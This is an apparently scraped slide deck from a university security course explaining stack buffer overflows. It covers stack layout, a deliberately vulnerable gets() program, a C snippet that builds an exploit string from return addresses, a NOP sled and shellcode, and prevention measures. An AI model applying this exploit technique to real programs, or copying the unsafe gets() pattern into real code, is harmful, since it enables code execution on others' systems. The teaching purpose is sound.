110 likes | 255 Views
BUFFER OVERFLOW -Eswar Balasubramanian ECE578. Precursor. How serious is this BO? Number of Vulnerabilities in the past week – 11 First Six vulnerabilities of 2002. Agenda. BO – what is it? About the stack Exploit Prevention. Buffer Overflow.
E N D
BUFFER OVERFLOW -Eswar Balasubramanian ECE578
Precursor How serious is this BO? • Number of Vulnerabilities in the past week – 11 • First Six vulnerabilities of 2002
Agenda • BO – what is it? • About the stack • Exploit • Prevention
Buffer Overflow • Copying more data into a buffer than it could hold char variable[10]; char safe[8] = “AAAAAAAA”; char unsafe[30] = “AAAAAAAAAAAAAAAAAAAAAAAAAAAAA”; strcpy(variable, safe); strcpy(variable, insafe);
Stack • Used by Functions • Variables are allocated dynamically • esp and ebp adjusted accordingly • /* vulnerable.c */ • int main() • { • char buffer[500]; • gets(buffer); • return 0; • } • Ret from gets points to “return 0” sfp ret from gets esp buffer [500] ebp sfp [4] ret [4]
What Next? • To alter the return address to our liking • To place a tailor made code to do what we like [ buffer ] [sfp] [ret] [xxxxxxxxxx] [xxxx] [xxxx] 500 4 4 Algorithm: • Copy the big string into the buffer area to overflow the sfp and ret • Overflow the ret such that the return address points to the beginning of the buffer • Upon completion the program will return to the place pointed by ret, which is altered to point to the beginning of the buffer. • This buffer will contain the code to do something we like
To Do • Calculate return address • Construct large string • Return address calculated by finding the stack pointer of gets() • Subtract a guessed value from esp
String initially filled entirely with the ret address • Beginning of the string with NOPs (1/3) • Fill with the tailor-made code • Overflow the buffer (usually by passing as argument)
char buffer[SIZE]; ret = esp - offset; // fill buffer with ret addr's ptr = buffer; addr_ptr = (long *)ptr; for(i=0; i<SIZE; i+=4) *(addr_ptr++) = ret; // fill first half of buffer with NOPs for(i=0; i<SIZE/2; i++) buffer[i] = '\x90'; // insert shellcode in the middle ptr = buffer + ((SIZE/2) - (strlen(listDir)/2)); for(i=0; i<strlen(listDir); i++) *(ptr++) = listDir[i];
PREVENTION • Use strncat(), strncpy(), fgets() • StackGuard • Patch to make stack non-executable • Wrapper libraries